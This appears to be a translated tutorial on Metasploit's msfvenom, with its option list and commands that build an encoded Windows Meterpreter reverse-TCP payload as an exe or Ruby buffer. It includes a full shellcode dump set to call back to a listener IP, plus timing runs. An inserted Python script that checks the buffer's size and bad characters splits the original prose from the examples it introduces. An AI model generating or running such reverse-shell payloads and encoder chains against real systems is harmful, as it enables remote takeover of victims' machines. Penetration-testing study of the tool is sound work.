Options:
-p, --payload [payload] Payload to use. Specify a '-' or stdin to use custom payloads
-l, --list [module_type] List a module type example: payloads, encoders, nops, all
-n, --nopsled [length] Prepend a nopsled of [length] size on to the payload
-f, --format [format] Format to output results in: raw, ruby, rb, perl, pl, c, js_be, js_le, java, dll, exe, exe-small, elf, macho, vba, vbs, loop-vbs, asp, war
-e, --encoder [encoder] The encoder to use
-a, --arch [architecture] The architecture to use
--platform [platform] The platform of the payload
-s, --space [length] The maximum size of the resulting payload
-b, --bad-chars [list] The list of characters to avoid example: '\x00\xff'
-i, --iterations [count] The number of times to encode the payload
-x, --template [path] Specify a custom executable file to use as a template
-k, --keep Preserve the template behavior and inject the payload as a new thread
-h, --help Show this message
msfvenom -p <PAYLOAD> -e <ENCODER> -f <OUTPUT FORMAT> > filename
e.g.:
msfvenom -p windows/meterpreter/reverse_tcp -f raw -e x86/jmp_call_additive LHOST=<OUR IP> | msfvenom -e x86/shikata_ga_nai -a x86 --platform windows -f exe > meter.exe
The Rapid7 site also gives an example of using the script, namely the creation of a reverse_tcp payload:
fahrenheit:msf3 bannedit$ msfvenom -p windows/meterpreter/reverse_tcp -f ruby -e -i 3 -s 480 LHOST=192.168.0.120
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
buf =
"\xd9\xf7\xd9\x74\x24\xf4\xbb\x9c\xec\xea\x8a\x5f\x2b\xc9"+
"\xb1\x50\x31\x5f\x18\x03\x5f\x18\x83\xef\x60\x0e\x1f\x31"+
"\x11\xe0\xa4\x2a\xfb\x23\xfd\xc7\xdf\x2f\xa4\x16\xd6\x61"+
"\x10\x68\xb2\x95\x20\x60\xbe\x95\x7c\x65\x55\x40\x38\x01"+
"\x4b\x51\x78\x5f\x1f\x36\xde\x3b\x99\x8c\xb2\x11\xb3\x8d"+
"\x2d\x4c\x66\x7c\xbd\x02\x0b\xa6\xa9\x1a\x32\x65\xcf\x75"+
"\xe8\x15\x1a\x62\x5f\x69\xe1\xdd\x90\x2e\x2e\x40\xe0\xb7"+
"\x8b\x16\xfe\x15\xdc\x34\x4c\x4e\x18\x18\x03\x46\x22\xff"+
"\xa8\x9b\xf0\xd5\x4f\xe0\xfd\xab\x71\x6e\x43\x03\xd5\x28"+
"\x07\x29\x5e\xad\x8f\xd8\xaf\xbd\x69\x06\xf1\xd1\x4e\x9b"+
"\x01\x7d\x5a\x75\x54\x76\x90\xdb\x5e\x7b\x97\x37\xa4\xab"+
"\x2d\xe2\x17\x8e\xcf\x4b\xd0\x3f\xef\xc6\xff\xe5\x1c\xc3"+
"\x99\x04\x15\x2e\xce\x5e\x16\x86\x5a\x2f\x62\x0a\x32\xe5"+
"\xe1\xa4\xd3\x32\x92\x13\xfd\xcf\xb6\xa2\x8b\x97\xce\xf8"+
"\x27\x12\xb0\x6f\xb5\xa8\x91\x30\x2c\x14\x40\x2f\x43\xd8"+
"\x45\x46\xd0\x4c\x58\x59\x8d\x78\x47\xb2\xda\x79\x6c\xfa"+
"\x07\x43\x18\xc4\x07\x0e\x2f\xd0\x71\x84\xcb\x1c\xab\x01"+
"\xb0\x17\xed\x07\x1b\xb0\xcf\xd1\x25\xc1\x9b\x62\x7c\xac"+
"\x43\x2e\x52\x36\xb1\xfc\x61\xbc\x0e\x56\xdc\xe1\x9d\xc2"+
"\x29\x3f\xe9\xf3\xb1\xe2\x72\x77\x99\x4b\xf3\xfc\x83\xd2"+
"\x19\x6d\x53\x4c\x64\xa0\xdd\x38\x82\x3d\x15\x66\x38\x96"+
"\x39\xb3\xa4\xe3\xff\x07\xb7\x8a\x23\xca\xc6\xaf\x57\x64"+
"\x3d\xf3\x23\x63\x42\x30\x90\x3b\x67\x26\x81\x24\x61\xc3"+
"\xe4\x51\x75\x30\x47\xf8\x15\xcb\x21\xe9\x2a\x30\x9d\x04"+
"\x28\xe3\x37\xb0\xa4\xaa\x1e\xf3"
This creates a payload in ruby format with the shikata_ga_nai encoder, which is chosen automatically from the encoder ranking; -s 480 states that the output must not exceed 480 bytes, and finally LHOST=192.168.0.120 sets the LHOST variable for use by the payload.
A comparison of execution speed is also given.
The first example shows the execution time of msfvenom, while the second shows that of msfpayload and msfencode together:
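When you receive output like the above, whether from your own build or from an artifact found during an investigation, it is worth cross-checking it rather than trusting the log lines: decode the ruby-format buffer back into bytes, confirm its length equals the size the last encoder iteration reported, check it against the -s limit, and confirm that none of the -b bad characters survived encoding. The following Python is an added example, not part of the original page or of Metasploit; the sample text it embeds is constructed (the first six lines of the buffer quoted above with shortened, made-up iteration sizes), and the function names are my own.

```python
import re

# Constructed sample modelled on the msfvenom '-f ruby' output quoted above.
# The buffer is the first six lines (84 bytes) of the page's dump; the three
# reported sizes were chosen so that the last one matches that length.
SAMPLE_OUTPUT = r'''
[*] x86/shikata_ga_nai succeeded with size 30 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 57 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 84 (iteration=3)
buf =
"\xd9\xf7\xd9\x74\x24\xf4\xbb\x9c\xec\xea\x8a\x5f\x2b\xc9"+
"\xb1\x50\x31\x5f\x18\x03\x5f\x18\x83\xef\x60\x0e\x1f\x31"+
"\x11\xe0\xa4\x2a\xfb\x23\xfd\xc7\xdf\x2f\xa4\x16\xd6\x61"+
"\x10\x68\xb2\x95\x20\x60\xbe\x95\x7c\x65\x55\x40\x38\x01"+
"\x4b\x51\x78\x5f\x1f\x36\xde\x3b\x99\x8c\xb2\x11\xb3\x8d"+
"\x2d\x4c\x66\x7c\xbd\x02\x0b\xa6\xa9\x1a\x32\x65\xcf\x75"
'''

# "[*] <encoder> succeeded with size <n> (iteration=<i>)"
LOG_RE = re.compile(r"^\[\*\] (\S+) succeeded with size (\d+) \(iteration=(\d+)\)$")
# one "\xNN" escape inside a Ruby string literal
HEX_RE = re.compile(r"\\x([0-9a-fA-F]{2})")


def parse_encoder_log(text):
    """Return [(encoder, size, iteration), ...] from the '[*] ... succeeded' lines."""
    found = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if m:
            found.append((m.group(1), int(m.group(2)), int(m.group(3))))
    return found


def parse_ruby_buf(text):
    """Decode the 'buf = "\\x.."+ "\\x.."' Ruby literal back into raw bytes.

    Only double-quoted fragments made entirely of \\xNN escapes after the
    'buf =' assignment are considered, so stray prose around the dump is ignored.
    """
    start = text.find("buf =")
    if start < 0:
        raise ValueError("no 'buf =' assignment found in text")
    chunks = re.findall(r'"((?:\\x[0-9a-fA-F]{2})*)"', text[start:])
    return b"".join(bytes.fromhex("".join(HEX_RE.findall(c))) for c in chunks)


def parse_bad_chars(spec):
    """Turn a -b style list such as '\\x00\\xff' into bytes."""
    return bytes.fromhex("".join(HEX_RE.findall(spec)))


def check_payload(text, max_size=None, bad_chars=b""):
    """Cross-check the decoded buffer against the encoder log and the
    -s / -b constraints that were requested. Returns a dict of findings."""
    log = parse_encoder_log(text)
    blob = parse_ruby_buf(text)
    return {
        "length": len(blob),
        "log_final_size": log[-1][1] if log else None,
        # the last iteration's reported size should equal the emitted buffer
        "size_matches_log": bool(log) and log[-1][1] == len(blob),
        # -s <length> is an upper bound on the finished payload
        "within_limit": max_size is None or len(blob) <= max_size,
        # any -b byte still present means the encoder did not (or could not) honour it
        "bad_chars_present": sorted({b for b in blob if b in bad_chars}),
        # shikata_ga_nai adds a fixed-size decoder stub on every iteration
        "growth_per_iteration": [later[1] - earlier[1] for earlier, later in zip(log, log[1:])],
    }


if __name__ == "__main__":
    report = check_payload(SAMPLE_OUTPUT, max_size=480, bad_chars=parse_bad_chars(r"\x00\xff"))
    for key, value in report.items():
        print(f"{key}: {value}")
```

Run against the page's full 24-line dump the same checks apply unchanged; a mismatch between `length` and `log_final_size` usually means the dump was truncated or edited before it reached you, and a non-empty `bad_chars_present` means the -b list was not satisfied and the payload should not be assumed to survive the filter it was built for.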
fahrenheit:msf3 bannedit$ time ./msfvenom -p windows/meterpreter/reverse_tcp -e -i 3 LHOST=192.168.0.120 -f ruby 1> /dev/null
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
real 0m2.744s
user 0m2.380s
sys 0m0.367s
fahrenheit:msf3 bannedit$ time ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.120 R|./msfencode -c 3 1> /dev/null
[*] x86/shikata_ga_nai succeeded with size 321 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 348 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 375 (iteration=3)
real 0m3.070s
user 0m4.227s
sys 0m0.778s